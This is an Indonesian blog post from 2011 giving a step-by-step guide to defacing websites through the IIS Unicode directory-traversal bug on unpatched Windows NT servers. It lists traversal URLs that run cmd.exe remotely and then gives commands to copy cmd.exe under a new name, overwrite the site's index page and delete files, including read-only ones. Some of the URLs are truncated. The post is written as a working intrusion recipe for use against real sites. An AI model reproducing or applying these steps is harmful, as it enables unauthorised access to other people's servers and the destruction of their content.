Kamis, 20 Januari 2011

Langkah Sederhana Buat Deface With CGI Bug

Langkah 1 : Mencari target

Mencari target dapat dilakukan dengan berbagai cara hal ini tergantung kreativitas dan sarana yang dimiliki, dalam hal ini bisa berbentuk script IRC, scanner. Sebagai dasar mengetahui OS yang digunakan server suatu site dapat diketahui dengan mencarinya pada situs http://www.netcraft.com/

Langkah 2 : Unicode

Setelah target didapat maka digunakan Unicode. Unicode itu sendiri penulis juga tidak terlalu mengetahui secara mendetail, tapi pada dasarnya Unicode menggunakan bahasa ASCII. Server yang menggunakan OS NT dengan IIS sendiri mempunyai bug yang bisa ditembus dengan Unicode dalam hal ini bila server itu belum dipatch. Unicode yang berhasil ditemukan untuk memasuki server NT sudah banyak. Dan yang bisa dicoba sebagai berikut:

http://target/_vti_bin/..%c0%af../.....exe?/c+dir+c:\
http://target/scripts/..%c0%af../..%...exe?/c+dir+c:\
http://target/msadc/..%c0%af../..%c0...exe?/c+dir+c:\
http://target/cgi-bin/..%c0%af../..%...exe?/c+dir+c:\
http://target/scripts/..%255c..%255c...exe?/c+dir+c:\
Bila Unicode tersebut berhasil maka akan dapat dilihat tampilan seperti berikut:

Directory of c:\
06/03/01 09:59a (DIR) InetPub
08/08/01 06:14p (DIR) WINNT

Langkah 3 :Mencari halaman depan

Saat membuka situs tersebut pada browser, kita pasti akan melihat tampilan muka dari site tersebut, perlu diperhatikan adalah file tampilan muka tersebut apa? biasanya antara lain: index.htm, index.html, default.htm, default.html. Kemudian dengan mengunakan Unicode tersebut kita mencari file tersebut letaknya dimana, biasanya di C:\inetpub\wwwroot (hal ini belum tentu). untuk mencari file tersebut dapat digunakan perintah:

/c+dir/s+c:\index.htm

Hal ini berarti perintah mencari file index.htm di dalam drive C
Untuk melihat apakah file index.htm tersebut adalah yang digunakan pada halaman depan, dipergunakan perintah :

/c+type+c:\direktory dan nama file, contoh : /c+type+c:\inetpub\wwwroot\index.htm

Setelah anda menemukan file index.htm tersebut, maka sebaiknya anda copy dulu, hal ini agar tindakan Deface kita tidak terlalu merugikan Administrator dari server situs tersebut. Sehingga nantinya Admin tersebut mempunyai backup dari file index.
perintah copy itu sendiri adalah:

/c+copy+c:\

contoh untuk pencopyan adalah:

/c+copy+c:\inetpub\wwwroot\index.htm backupindex.htm

untuk mempermudah pekerjaan dapat dilakukan pencopyan file cmd.exe yg berada di direktory c:/winnt/system32 dengan menggunakan nama anda, seperti :

/c+copy+c:\winnt\system32\cmd.exe+c:\deface.exe

hal ini berarti anda mencopy file cmd.exe ke dir c dgn nama deface.exe, sehingga untuk perintah2 selanjutnya tidak memerlukan /winnt/system32/cmd.exe?/ tapi cukup /deface.exe?/



Langkah 4 : Meng-Copy file index.htm

echo dalam dos berarti anda membuat file maka bila file index.htm yg asli anda echo berarti anda timpa dengan file index anda. Untuk perintahnya adalah:

/deface.exe?/c+echo+"deface+was+here"+>+c:\inetpub\wwwroot\inde x.htm

sehingga tampilan site depan telah terganti dengan tulisan
deface was here
Code:
Catatan:

Hal ini berlaku bila file index.htm tersebut dapat diecho, karena sebagian server membatasi direktory root dengan atribut read only, sehingga perintah echo index.htm akan menghasilkan :
Access Denied
Untuk membuat deface anda menjadi lebih bagus, dapat digunakan bahasa HTML dan ASCII
perintah-perintah lain :

membuat direktory = /c+mkdir+c:\
merubah nama file = /c+ren+c:\file
menghapus file = /c+del+c:\file
menghapus file Read-Only = /c+del+/R+c:\file

Always With US BeaCheater

0 komentar:

Posting Komentar